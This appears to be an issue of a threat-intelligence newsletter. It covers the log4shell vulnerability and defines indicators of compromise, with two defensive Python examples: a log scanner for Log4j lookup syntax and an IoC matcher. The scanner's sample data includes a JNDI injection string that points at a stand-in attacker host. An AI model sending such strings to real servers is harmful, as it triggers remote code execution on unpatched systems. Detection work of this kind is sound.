Indicators of compromise (IoCs) identified
Compromise reports identified (grouping of IoCs)
HIGHLIGHT OF THE MONTH
We have chosen to dedicate this first highlight to the CVE-2021-44228 vulnerability, better known as log4shell.
Despite being only a small part of the picture (1.48% of our Top CVE), it is the first of a series of critical vulnerabilities affecting the log4j library. The danger posed by CVE-2021-44228 lies in its ability to let an attacker execute arbitrary code remotely by submitting data to an application that logs it through the vulnerable library.
The exploitation of this vulnerability has already been performed by many cybercriminal groups in order to propagate several malware and offensive tools such as Kinsing, Conti, Dridex or Cobalt Strike, as well as Mirai variants, …
LastInfoSec’s CTI analyst team has observed that the vulnerability is still being actively exploited in the wild. We therefore advise companies and organizations to keep deploying the available patches without delay and to update the tools already in place to detect this vulnerability.
In a nutshell, the rapid exploitation by many malicious actors of a vulnerability with this level of risk, and the potentially severe impact it can have on every user, is a useful reminder at the start of the year of the importance of maintaining an active monitoring policy for emerging threats and of reinforcing the patching strategies in place.
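To make the "update the tools in place to detect this vulnerability" advice concrete, here is an added example (not code from the Barometer or from Gatewatcher) of the kind of detection logic a defender can run over web-server access logs. It flags any Log4j lookup syntax ("${...}") found in untrusted request fields, since legitimate clients almost never send it, and raises the severity when the lookup names the JNDI scheme that CVE-2021-44228 abuses. The log lines are constructed for the example and the hostnames use the reserved .invalid domain.

```python
import re
from typing import Dict, List

# Constructed Apache-style access log lines (not from any real system).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example.invalid/a}"',
    '10.0.0.7 - - [01/Jan/2022:10:00:03 +0000] "GET /?q=${env:PATH} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.3 - - [01/Jan/2022:10:00:04 +0000] "GET /price?amount=$100 HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

# Log4j 2 lookup syntax: "${" followed by anything up to the closing brace.
# Matching the whole syntax, rather than one specific keyword, keeps the
# detector from depending on the exact spelling of a payload.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def classify_line(line: str) -> Dict[str, object]:
    """Return a severity and the lookup tokens found in one log line.

    clean  : no lookup syntax at all
    review : lookup syntax present, but no JNDI scheme (e.g. ${env:...})
    high   : a lookup naming jndi, the CVE-2021-44228 trigger
    """
    tokens = LOOKUP_RE.findall(line)
    if not tokens:
        severity = "clean"
    elif any("jndi" in token.lower() for token in tokens):
        severity = "high"
    else:
        severity = "review"
    return {"severity": severity, "tokens": tokens}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a whole log and keep only the lines that need attention."""
    findings = []
    for number, line in enumerate(lines, start=1):
        result = classify_line(line)
        if result["severity"] != "clean":
            findings.append({"line": number, **result})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['severity']} {finding['tokens']}")
```

The "review" tier matters in practice: a plain "${...}" in a User-Agent or query string is unusual enough to be worth a look even when the scheme is not JNDI, and it avoids tying the rule to one exact payload string. Real deployments should feed the same logic from the log pipeline (SIEM or log shipper) rather than from a list in memory, and pair it with confirmation that the log4j version in use has actually been patched.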
DEFINITION OF THE MONTH
An Indicator of Compromise (IoC) is a set of characteristics, or artifacts, representative of known malicious behavior. IoCs make it possible to detect whether an attack has taken place and to identify the tools used and the specific patterns associated with certain attackers.
IoCs allow the organization affected by a compromise to detect it promptly and implement the appropriate incident response actions. The hash of a malicious file, a phishing site’s URL or a Command & Control server domain are a few examples of possible IoCs.
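The three IoC types named above (file hash, phishing URL, C2 domain) are matched in different ways, and the normalization step is where detection usually fails. The following added example (not code from the Barometer or from Gatewatcher CTI) loads a small IoC feed, normalizes each indicator, and matches it against constructed file, DNS and HTTP events. All indicator values are constructed placeholders using the reserved .invalid domain; the "known bad" file is just a byte string hashed at load time.

```python
import hashlib
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed IoC feed (placeholder values, not real indicators).
KNOWN_BAD_SAMPLE = b"constructed byte string standing in for a known malicious file"
RAW_IOC_FEED: Dict[str, Set[str]] = {
    "sha256": {hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest().upper()},
    "domain": {"C2.example.invalid."},
    "url": {"HTTP://Phish.example.invalid/login"},
}

# Constructed telemetry events of three kinds: file, dns, http.
EVENTS: List[Dict[str, object]] = [
    {"id": 1, "kind": "file", "content": KNOWN_BAD_SAMPLE},
    {"id": 2, "kind": "file", "content": b"an unrelated clean document"},
    {"id": 3, "kind": "dns", "query": "c2.EXAMPLE.invalid"},
    {"id": 4, "kind": "http", "url": "http://phish.example.invalid/login?session=abc"},
    {"id": 5, "kind": "http", "url": "https://www.example.invalid/"},
]


def norm_domain(domain: str) -> str:
    """Lower-case and drop the trailing dot DNS resolvers often add."""
    return domain.strip().lower().rstrip(".")


def norm_url(url: str) -> str:
    """Keep scheme, host and path only; query strings vary per victim."""
    parts = urlparse(url.strip())
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}{parts.path or '/'}"


def load_feed(raw: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Normalize every indicator once, so matching is a plain set lookup."""
    return {
        "sha256": {h.lower() for h in raw.get("sha256", ())},
        "domain": {norm_domain(d) for d in raw.get("domain", ())},
        "url": {norm_url(u) for u in raw.get("url", ())},
    }


def match_events(events: List[Dict[str, object]], feed: Dict[str, Set[str]]) -> List[Dict[str, str]]:
    """Return one hit per event that matches an indicator in the feed."""
    hits: List[Dict[str, str]] = []
    for event in events:
        if event["kind"] == "file":
            digest = hashlib.sha256(event["content"]).hexdigest()
            if digest in feed["sha256"]:
                hits.append({"event": event["id"], "ioc_type": "sha256", "value": digest})
        elif event["kind"] == "dns":
            query = norm_domain(event["query"])
            if query in feed["domain"]:
                hits.append({"event": event["id"], "ioc_type": "domain", "value": query})
        elif event["kind"] == "http":
            url = norm_url(event["url"])
            host = norm_domain(urlparse(event["url"]).hostname or "")
            if url in feed["url"]:
                hits.append({"event": event["id"], "ioc_type": "url", "value": url})
            elif host in feed["domain"]:
                # A request to a C2 domain matches even if the exact URL is unknown.
                hits.append({"event": event["id"], "ioc_type": "domain", "value": host})
    return hits


if __name__ == "__main__":
    for hit in match_events(EVENTS, load_feed(RAW_IOC_FEED)):
        print(hit)
```

Note how the feed deliberately contains mixed case, a trailing dot and an upper-case hex digest: without load_feed's normalization, events 1, 3 and 4 would all be missed even though each one is a genuine match. The same discipline applies to any IoC source, whether it is a commercial CTI platform or a hand-maintained list.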
ABOUT THE CYBER THREATS BAROMETER
Malware, zero-day vulnerabilities, advanced persistent threats, industries and sectors particularly targeted, weak signals of emerging attacks… It’s no secret that knowledge of one’s adversary is a key factor for the security of an enterprise. The Cyber Threats Barometer gives you a monthly overview of the cyber threats detected in the previous month by Gatewatcher CTI, our Cyber Threat Intelligence platform.
Gatewatcher CTI’s automated collection, analysis and correlation engines are continuously fed by more than three thousand data sources from multiple channels: social networks, specialized sites, dark and deep web. They make threat information available an average of 24 hours ahead of the competition and help operational response teams make better decisions by dramatically reducing their analysis and incident handling times.